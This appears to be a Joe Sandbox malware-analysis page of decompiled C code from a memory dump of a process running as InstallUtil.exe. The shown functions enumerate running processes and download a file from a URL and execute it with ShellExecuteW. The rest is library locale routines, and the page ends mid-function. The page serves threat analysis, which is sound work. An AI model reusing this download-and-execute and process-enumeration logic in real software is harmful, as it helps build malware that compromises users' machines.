Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: 27e34cea9e1d0df1f6daa4209800672c95583c587532d31e79eebf6b15aa0a5d
Instruction ID: 08439ae8b33b50fc5d6a13e5a6783f37bbabfab6e2bc077479c497040ee348bf
Opcode Fuzzy Hash: 27e34cea9e1d0df1f6daa4209800672c95583c587532d31e79eebf6b15aa0a5d
Instruction Fuzzy Hash: D15150729042099ACF04FB75DD569ED7768AF10348F50417EB806B71E2EF38AB49CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3C8 Relevance: 7.6, APIs: 5, Instructions: 132
processCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040D3C8(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				char _v540;
				char _v568;
				void* _v572;
				void* _v584;
				char _v604;
				void* _v608;
				char _v628;
				void* _v632;
				char _v652;
				void* _v656;
				char _v676;
				void* _v680;
				char _v700;
				void* _v704;
				char _v724;
				void* _v728;
				char _v748;
				void* _v752;
				char _v772;
				void* _v776;
				char _v796;
				void* _v800;
				char _v820;
				void* _v824;
				char _v844;
				void* _v848;
				char _v868;
				void* _v872;
				char _v892;
				void* _v896;
				char _v912;
				char _v916;
				void* _v920;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t45;
				void* _t50;
				void* _t51;
				void* _t53;
				void* _t133;
				void* _t134;

				_t120 = __edx;
				_t81 = __ecx;
				_t80 = __ebx;
				_t133 = __ecx;
				E0040209F(__ebx, __ecx);
				 *0x46dea8 = E004186B9(_t81);
				_t134 = CreateToolhelp32Snapshot(2, 0);
				if(_t134 != 0) {
					_v568 = 0x22c;
					_push( &_v568);
					Process32FirstW(_t134);
					_t45 = Process32NextW(_t134,  &_v572);
					_t138 = _t45;
					if(_t45 != 0) {
						do {
							E0040413E(__ebx,  &_v912, _t120, 0x462008,  &_v540);
							_t50 = E004182D1(_t80,  &_v604, E004186E7(_v572) & 0x000000ff);
							_t51 = E004182D1(_t80,  &_v628, _v572);
							_t53 = E00418445(_t80,  &_v676, E0041871D( &_v652, _v572));
							_t120 = E00402E61( &_v868, E0040793B(_t80,  &_v844, E00402E61( &_v820, E0040793B(_t80,  &_v796, E00402E61( &_v772, E0040793B(_t80,  &_v748, E004078D8(_t80,  &_v724, _t133, 0x462008, _t138, E00418445(_t80,  &_v700,  &_v916)), _t133, 0x462008, _t138, 0x462008), _t53), _t133, 0x462008, _t138, 0x462008), _t51), _t133, 0x462008, _t138, 0x462008), _t50);
							E00401FA2(_t133, _t61, _t134, E0040793B(_t80,  &_v892, _t61, _t133, 0x462008, _t138, "|"));
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401EC9();
							E00401F98();
							E00401F98();
							E00401EC9();
						} while (Process32NextW(_t134,  &_v584) != 0);
					}
					CloseHandle(_t134);
				}
				return _t133;
			}

0x0040d3c8
0x0040d3c8
0x0040d3c8
0x0040d3d1
0x0040d3d3
0x0040d3e1
0x0040d3ec
0x0040d3f0
0x0040d3fd
0x0040d408
0x0040d40a
0x0040d419
0x0040d41f
0x0040d421
0x0040d42c
0x0040d438
0x0040d458
0x0040d46d
0x0040d490
0x0040d50b
0x0040d51a
0x0040d523
0x0040d52c
0x0040d535
0x0040d53e
0x0040d54a
0x0040d556
0x0040d562
0x0040d56e
0x0040d57a
0x0040d586
0x0040d592
0x0040d59e
0x0040d5aa
0x0040d5b3
0x0040d5c7
0x0040d42c
0x0040d5d0
0x0040d5d0
0x0040d5e1

APIs

Part of subcall function 004186B9: GetCurrentProcess.KERNEL32(?,?,?,004190D4,WinDir,00000000,00000000), ref: 004186CA
Part of subcall function 004186B9: IsWow64Process.KERNEL32(00000000,?,?,004190D4,WinDir,00000000,00000000), ref: 004186D1

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040D3E6
Process32FirstW.KERNEL32(00000000,?), ref: 0040D40A
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D419
CloseHandle.KERNEL32(00000000), ref: 0040D5D0

Part of subcall function 004186E7: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040D11A,00000000,?,?,00000001), ref: 004186FC
Part of subcall function 004186E7: IsWow64Process.KERNEL32(00000000,?,?,?,00000001), ref: 00418707

Part of subcall function 0041871D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00418732

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D5C1

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Process$Process32$NextOpenWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 44284711-0
Opcode ID: 1e3e0d5857e4e82ba1d5393f40dcc210af5bbf592fa685b727e1ed2b8d51dd47
Instruction ID: 875a3bb42d5602bce30afad110d203e4b696146524c0371441d018b9139525ce
Opcode Fuzzy Hash: 1e3e0d5857e4e82ba1d5393f40dcc210af5bbf592fa685b727e1ed2b8d51dd47
Instruction Fuzzy Hash: DA4183311082455FC325FB21DC51AEFB3E9AF94308F50493EB54A961E2EF386A4AC75A

Uniqueness

Uniqueness Score: -1.00%

Function 00405CE1 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00405CE1(short* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v28;
				char _v44;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				void* _v104;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t33;
				void* _t50;
				signed char _t54;
				intOrPtr* _t57;
				void* _t59;
				void* _t63;
				void* _t70;
				void* _t72;
				void* _t77;
				intOrPtr* _t79;
				void* _t81;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t88;
				void* _t106;
				void* _t120;
				void* _t144;
				void* _t148;
				void* _t155;
				signed int _t156;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t163;
				void* _t167;
				void* _t168;

				_t168 = __eflags;
				_t140 = __edx;
				_t33 = E00401F6B( &_a8);
				_push(0xffffffff);
				_t88 = 4;
				_push(_t88);
				_push( &_v28);
				E00404162( &_a8);
				_t159 = (_t156 & 0xfffffff8) - 0x2c;
				E004020B6(_t88, _t159, __edx, _t168, 0x46e260);
				_t160 = _t159 - 0x18;
				E004020B6(_t88, _t160, __edx, _t168,  &_v44);
				E0041851D( &_v84, _t140);
				_t161 = _t160 + 0x30;
				_t148 =  *_t33 - _t88;
				if(_t148 == 0) {
					_t144 = 0;
					E00401E25( &_v64, _t140, _t155, __eflags, 0);
					_t141 = "F";
					__eflags = E00405ADC("F");
					if(__eflags == 0) {
						E00401E25( &_v68, "F", _t155, __eflags, 0);
						_t140 = "M";
						__eflags = E00405ADC("M");
						if(__eflags == 0) {
							L23:
							E00401E4D( &_v64, _t140);
							E00401F98();
							E00401F98();
							return 0;
						}
						_v68 = 0;
						_t50 = E00401F6B(E00401E25( &_v64, "M", _t155, __eflags, _t88));
						_t140 =  &_v76;
						__eflags = E00418192(_t50,  &_v76,  &_v68);
						if(__eflags == 0) {
							_t106 = _t161 - 0x18;
							_push("2");
							L22:
							E00402053(_t88, _t106, _t140, _t155);
							_push(0xb3);
							E00404A78(_a4, _t140, __eflags);
							goto L23;
						}
						_t140 = _v72;
						_t54 = E004150C2(0x46daf8);
						L0043868C(_v72);
						_t163 = _t161 - 0x18;
						__eflags = (_t54 & 0x000000ff) - 1;
						L9:
						_t106 = _t163;
						if(__eflags != 0) {
							_push("3");
						} else {
							_push("1");
						}
						goto L22;
					}
					_t57 = E00401F6B(E00401E25( &_v68, "F", _t155, __eflags, 2));
					_t59 = E00401F6B(E00401E25( &_v68, _t141, _t155, __eflags, 3));
					_t140 =  *_t57;
					E0041905E( &_v60,  *_t57, _t59);
					_t63 = E00401F6B(E00401E25( &_v72,  *_t57, _t155, __eflags, _t88));
					__imp__URLDownloadToFileW(0, _t63, E00401EC4( &_v60), 0, 0);
					__eflags = _t63;
					if(__eflags == 0) {
						L4:
						if( *((char*)(E00401F6B(E00401E25( &_v84, _t140, _t155, _t172, 1)))) == 0) {
							_t120 = _t161 - 0x18;
							_push("0");
						} else {
							_t70 = ShellExecuteW(_t144, L"open", E00401EC4( &_v72), _t144, _t144, 1);
							_t120 = _t161 - 0x18;
							_t174 = _t70 - 0x20;
							if(_t70 > 0x20) {
								_push("1");
							} else {
								_push("3");
							}
						}
						L17:
						E00402053(_t88, _t120, _t140, _t155);
						_push(0xb3);
						E00404A78(_a4, _t140, _t174);
						E00401EC9();
						goto L23;
					}
					L14:
					_t120 = _t161 - 0x18;
					_push("2");
					goto L17;
				}
				_t170 = _t148 != 1;
				if(_t148 != 1) {
					goto L23;
				}
				_t144 = 0;
				E00401E25( &_v64, _t140, _t155, _t170, 0);
				_t142 = "F";
				_t72 = E00405ADC("F");
				_t171 = _t72;
				if(_t72 == 0) {
					E00401E25( &_v68, "F", _t155, __eflags, 0);
					_t140 = "M";
					__eflags = E00405ADC("M");
					if(__eflags == 0) {
						goto L23;
					} else {
						_t140 = E00401F6B(E00401E25( &_v64, "M", _t155, __eflags, _t88));
						_t77 = E004150C2(0x46daf8);
						_t163 = _t161 - 0x18;
						__eflags = _t77 - 1;
						goto L9;
					}
				}
				_t79 = E00401F6B(E00401E25( &_v68, "F", _t155, _t171, 2));
				_t81 = E00401F6B(E00401E25( &_v68, _t142, _t155, _t171, 3));
				_t140 =  *_t79;
				E0041905E( &_v60,  *_t79, _t81);
				_t83 = E00401EC4( &_v60);
				_t84 = E00401E25( &_v72,  *_t79, _t155, _t171, _t88);
				_t167 = _t161 - 0x18;
				E004020B6(_t88, _t167, _t140, _t171, _t84);
				_t86 = E00418A12(_t83);
				_t161 = _t167 + 0x18;
				_t172 = _t86 - 1;
				if(_t86 != 1) {
					goto L14;
				}
				goto L4;
			}

0x00405ce1
0x00405ce1
0x00405cf0
0x00405cf5
0x00405cf9
0x00405cff
0x00405d04
0x00405d05
0x00405d0a
0x00405d14
0x00405d19
0x00405d23
0x00405d2c
0x00405d31
0x00405d34
0x00405d36
0x00405e6b
0x00405e72
0x00405e77
0x00405e87
0x00405e89
0x00405f29
0x00405f2e
0x00405f3a
0x00405f3c
0x00405faa
0x00405fae
0x00405fb7
0x00405fbf
0x00405fcc
0x00405fcc
0x00405f42
0x00405f53
0x00405f58
0x00405f64
0x00405f66
0x00405f91
0x00405f93
0x00405f98
0x00405f98
0x00405fa0
0x00405fa5
0x00000000
0x00405fa5
0x00405f68
0x00405f71
0x00405f7d
0x00405f83
0x00405f86
0x00405e53
0x00405e53
0x00405e55
0x00405e61
0x00405e57
0x00405e57
0x00405e57
0x00000000
0x00405e55
0x00405e98
0x00405eac
0x00405eb1
0x00405eb8
0x00405ed6
0x00405edd
0x00405ee3
0x00405ee5
0x00405dca
0x00405ddf
0x00405f01
0x00405f03
0x00405de5
0x00405df9
0x00405e02
0x00405e04
0x00405e07
0x00405ef7
0x00405e0d
0x00405e0d
0x00405e0d
0x00405e07
0x00405f08
0x00405f08
0x00405f10
0x00405f15
0x00405f1e
0x00000000
0x00405f1e
0x00405eeb
0x00405eee
0x00405ef0
0x00000000
0x00405ef0
0x00405d3c
0x00405d3f
0x00000000
0x00000000
0x00405d45
0x00405d4c
0x00405d51
0x00405d58
0x00405d61
0x00405d63
0x00405e18
0x00405e1d
0x00405e29
0x00405e2b
0x00000000
0x00405e31
0x00405e42
0x00405e49
0x00405e4e
0x00405e51
0x00000000
0x00405e51
0x00405e2b
0x00405d72
0x00405d86
0x00405d8b
0x00405d92
0x00405d9c
0x00405da8
0x00405dad
0x00405db3
0x00405dba
0x00405dbf
0x00405dc2
0x00405dc4
0x00000000
0x00000000
0x00000000

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00405DF9
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00405EDD

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, xrefs: 00405E44, 00405F6C
open, xrefs: 00405DF3

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe$open
API String ID: 2825088817-3283330448
Opcode ID: 4b64103677c21db963c478d9da3482afbd7fa024788eee8ed7d6eef4609f2a41
Instruction ID: 55cac6a69391351ff621bf79e6dbd42a0a3a38598ca708c99eb2f4446a69e34d
Opcode Fuzzy Hash: 4b64103677c21db963c478d9da3482afbd7fa024788eee8ed7d6eef4609f2a41
Instruction Fuzzy Hash: 5961D271B0470166CA14FB76C9669BF36A59F81308F00093FF842B71E2EE3C8949C69B

Uniqueness

Uniqueness Score: -1.00%

Function 0044DA49 Relevance: 6.2, APIs: 4, Instructions: 236
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E0044DA49(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				signed int _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				short _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t34 = E00444255(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E0044D9DA(0x45b1e0, 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E0044D34B(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E0044D46E();
					} else {
						E0044D3D4(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E0044D9DA(0x45aed0, 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E0044D46E();
							} else {
								E0044D3D4(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E0044D8A8(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t121 = _a12;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t15 = _t121 + 0x120; // 0x440c53
							_t89 = _t15;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E0044BE3A(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00438659();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x46c00c; // 0xe1ce05e9
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E00444255(_t89, _t100, _t116);
								_t122 =  *(E00444255(_t90, _t100, _t116) + 0x34c);
								_t129 = E0044E15C(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E0044F785(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v272);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E0044E290(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								__eflags = _v32 ^ _t132;
								return E004318FB(_v32 ^ _t132);
							} else {
								_t68 = E0044492D(_t100, _t127, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t20 = _t121 + 0x80; // 0x440bb3
									_t92 = _t20;
									_t21 = _t121 + 0x120; // 0x440c53
									if(E0044492D(_t100, _t127, _t154, _t21, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E004536E7(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											_t22 = _t121 + 0x120; // 0x440c53
											if(E0044492D(_t112, _t127, _t157, _t22, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E004536E7(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												_t23 = _t121 + 0x100; // 0x440c33
												E0043DE3F(_t112, _t127, _t23, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}

0x0044da49
0x0044da4e
0x0044da4f
0x0044da50
0x0044da51
0x0044da52
0x0044da53
0x0044da58
0x0044da5b
0x0044da5d
0x0044da60
0x0044da60
0x0044da63
0x0044da63
0x0044da69
0x0044da6c
0x0044da6f
0x0044da6f
0x0044da72
0x0044da75
0x0044da7b
0x0044da7d
0x0044da82
0x0044da8c
0x0044da91
0x0044da94
0x0044da94
0x0044da98
0x0044da9c
0x0044dae5
0x00000000
0x0044da9e
0x0044daa3
0x0044daac
0x0044daa5
0x0044daa5
0x0044daa5
0x0044dab3
0x0044dab7
0x0044dac1
0x0044dac6
0x0044dacb
0x0044dad1
0x0044dad5
0x0044dade
0x0044dad7
0x0044dad7
0x0044dad7
0x0044daea
0x0044daea
0x0044daea
0x0044dacb
0x0044dab7
0x0044daf0
0x0044dc02
0x0044dc02
0x0044dc02
0x00000000
0x0044daf6
0x0044db03
0x0044db09
0x00000000
0x0044db39
0x0044db39
0x0044db3e
0x0044db40
0x0044db40
0x0044db42
0x0044db47
0x0044dbfd
0x0044dbff
0x00000000
0x0044db4d
0x0044db4d
0x0044db50
0x0044db50
0x0044db58
0x0044db5b
0x0044db5e
0x0044db5e
0x0044db61
0x0044db64
0x0044db6c
0x0044db71
0x0044db78
0x0044db7d
0x0044db80
0x0044db82
0x0044dc0d
0x0044dc0e
0x0044dc0f
0x0044dc10
0x0044dc11
0x0044dc12
0x0044dc17
0x0044dc1b
0x0044dc23
0x0044dc2a
0x0044dc2d
0x0044dc2e
0x0044dc32
0x0044dc38
0x0044dc40
0x0044dc4f
0x0044dc5b
0x0044dc6c
0x0044dc72
0x0044dc74
0x0044dc85
0x0044dc8c
0x0044dc8e
0x0044dc91
0x0044dc97
0x0044dc99
0x0044dc9b
0x0044dc9b
0x0044dc9e
0x0044dca1
0x0044dca1
0x0044dc99
0x0044dcab
0x0044dc76
0x0044dc76
0x0044dc78
0x0044dcb3
0x0044dcbe
0x0044db88
0x0044db91
0x0044db96
0x0044db98
0x00000000
0x0044db9a
0x0044db9c
0x0044db9c
0x0044dba8
0x0044dbb6
0x00000000
0x0044dbb8
0x0044dbb8
0x0044dbbb
0x0044dbc1
0x0044dbc4
0x0044dbd4
0x0044dbd9
0x0044dbe7
0x00000000
0x00000000
0x00000000
0x00000000
0x0044dbc6
0x0044dbc6
0x0044dbc9
0x0044dbcf
0x0044dbd0
0x0044dbd2
0x0044dbe9
0x0044dbed
0x0044dbf5
0x00000000
0x00000000
0x00000000
0x00000000
0x0044dbd2
0x0044dbc4
0x0044dbb6
0x0044dc04
0x0044dc0a
0x0044dc0a
0x0044db82
0x0044db47
0x0044db09

APIs

Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00440B33,?,?,?,?,0044058A,?,00000004), ref: 0044DB2B
_wcschr.LIBVCRUNTIME ref: 0044DBBB
_wcschr.LIBVCRUNTIME ref: 0044DBC9
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00440B33,00000000,00440C53), ref: 0044DC6C

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: f18fc354256aacc0aa0c3c00cb84dedb87302ef82b525088d055e9cd767a0e65
Instruction ID: a54651c51f7673d7e4d8e5c92585977fdf8441358307bd5fe5e04e11595a8cab
Opcode Fuzzy Hash: f18fc354256aacc0aa0c3c00cb84dedb87302ef82b525088d055e9cd767a0e65
Instruction Fuzzy Hash: 4361E871A00206AAF725AF75CC86BAB73A8EF44314F14446FF905D7281EB78E941C769

Uniqueness

Uniqueness Score: -1.00%

Function 0044492D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0044058A,?,00000004), ref: 00444980

Strings

<@, xrefs: 0044496B
GetLocaleInfoEx, xrefs: 00444948

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: <@$GetLocaleInfoEx
API String ID: 2299586839-3030495286
Opcode ID: 0e0db81ea1fbb4284e44cdcda5cdd5e55a7d1dae45efcb42dc054bc0dd1b22e5
Instruction ID: 08b6c74300ceb697b9f10d41a8b1cd9753f5326917c7ca5d3ca67bc9f60801a1
Opcode Fuzzy Hash: 0e0db81ea1fbb4284e44cdcda5cdd5e55a7d1dae45efcb42dc054bc0dd1b22e5
Instruction Fuzzy Hash: B8F0F671A41608B7DB016F65DC05F6E7B65EB44711F00011AFC056A251DA798D20969D

Uniqueness

Uniqueness Score: -1.00%

Function 0044DE34 Relevance: 4.7, APIs: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0044DE34(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebp;
				signed int _t50;
				signed int _t58;
				signed int _t67;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				intOrPtr _t75;
				signed int _t76;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				void* _t92;
				intOrPtr* _t113;
				void* _t117;
				intOrPtr* _t119;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t127;
				signed int* _t129;
				int _t132;
				signed int _t133;
				void* _t134;

				_t50 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t50 ^ _t133;
				_t92 = E00444255(__ebx, __ecx, __edx);
				_t129 =  *(E00444255(_t92, __ecx, __edx) + 0x34c);
				_t132 = E0044E15C(_a4);
				asm("sbb ecx, ecx");
				if(GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
					_t58 = E0044F785(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x54)),  &_v248);
					_v252 = _v252 & 0x00000000;
					__eflags = _t58;
					if(_t58 != 0) {
						L18:
						__eflags = ( *_t129 & 0x00000300) - 0x300;
						if(( *_t129 & 0x00000300) == 0x300) {
							L39:
							__eflags =  !( *_t129 >> 2) & 0x00000001;
							L40:
							return E004318FB(_v8 ^ _t133);
						}
						asm("sbb ecx, ecx");
						_t67 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
						__eflags = _t67;
						if(_t67 != 0) {
							_t69 = E0044F785(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
							__eflags = _t69;
							if(_t69 != 0) {
								__eflags =  *(_t92 + 0x60);
								if( *(_t92 + 0x60) != 0) {
									goto L39;
								}
								__eflags =  *(_t92 + 0x5c);
								if( *(_t92 + 0x5c) == 0) {
									goto L39;
								}
								_t72 = E0044F785(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
								__eflags = _t72;
								if(_t72 != 0) {
									goto L39;
								}
								_push(_t129);
								_t73 = E0044E2B4(0, _t132, 0);
								__eflags = _t73;
								if(_t73 == 0) {
									goto L39;
								}
								 *_t129 =  *_t129 | 0x00000100;
								__eflags = _t129[1];
								L37:
								if(__eflags == 0) {
									_t129[1] = _t132;
								}
								goto L39;
							}
							 *_t129 =  *_t129 | 0x00000200;
							_t123 =  *_t129;
							__eflags =  *(_t92 + 0x60) - _t69;
							if( *(_t92 + 0x60) == _t69) {
								__eflags =  *(_t92 + 0x5c) - _t69;
								if( *(_t92 + 0x5c) == _t69) {
									goto L23;
								}
								_t113 =  *((intOrPtr*)(_t92 + 0x50));
								_v256 = _t113 + 2;
								do {
									_t75 =  *_t113;
									_t113 = _t113 + 2;
									__eflags = _t75 - _v252;
								} while (_t75 != _v252);
								__eflags = _t113 - _v256 >> 1 -  *(_t92 + 0x5c);
								if(_t113 - _v256 >> 1 !=  *(_t92 + 0x5c)) {
									_t69 = 0;
									goto L23;
								}
								_push(_t129);
								_t76 = E0044E2B4(_t92, _t132, 1);
								__eflags = _t76;
								if(_t76 == 0) {
									goto L39;
								}
								 *_t129 =  *_t129 | 0x00000100;
								_t69 = 0;
								L24:
								__eflags = _t129[1] - _t69;
								goto L37;
							}
							L23:
							_t124 = _t123 | 0x00000100;
							__eflags = _t124;
							 *_t129 = _t124;
							goto L24;
						}
						 *_t129 = _t67;
						L2:
						goto L40;
					}
					asm("sbb eax, eax");
					_t84 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
					__eflags = _t84;
					if(_t84 == 0) {
						goto L1;
					}
					_t86 = E0044F785(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
					_pop(_t117);
					__eflags = _t86;
					if(_t86 != 0) {
						__eflags =  *_t129 & 0x00000002;
						if(( *_t129 & 0x00000002) != 0) {
							goto L18;
						}
						__eflags =  *(_t92 + 0x5c);
						if( *(_t92 + 0x5c) == 0) {
							L14:
							_t125 =  *_t129;
							__eflags = _t125 & 0x00000001;
							if((_t125 & 0x00000001) != 0) {
								goto L18;
							}
							_t87 = E0044E290(_t132);
							__eflags = _t87;
							if(_t87 == 0) {
								goto L18;
							}
							_t126 = _t125 | 0x00000001;
							__eflags = _t126;
							 *_t129 = _t126;
							goto L17;
						}
						_t89 = E0043AB1E(_t92, _t117, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248,  *(_t92 + 0x5c));
						_t134 = _t134 + 0xc;
						__eflags = _t89;
						if(_t89 != 0) {
							goto L14;
						}
						 *_t129 =  *_t129 | 0x00000002;
						__eflags =  *_t129;
						_t129[2] = _t132;
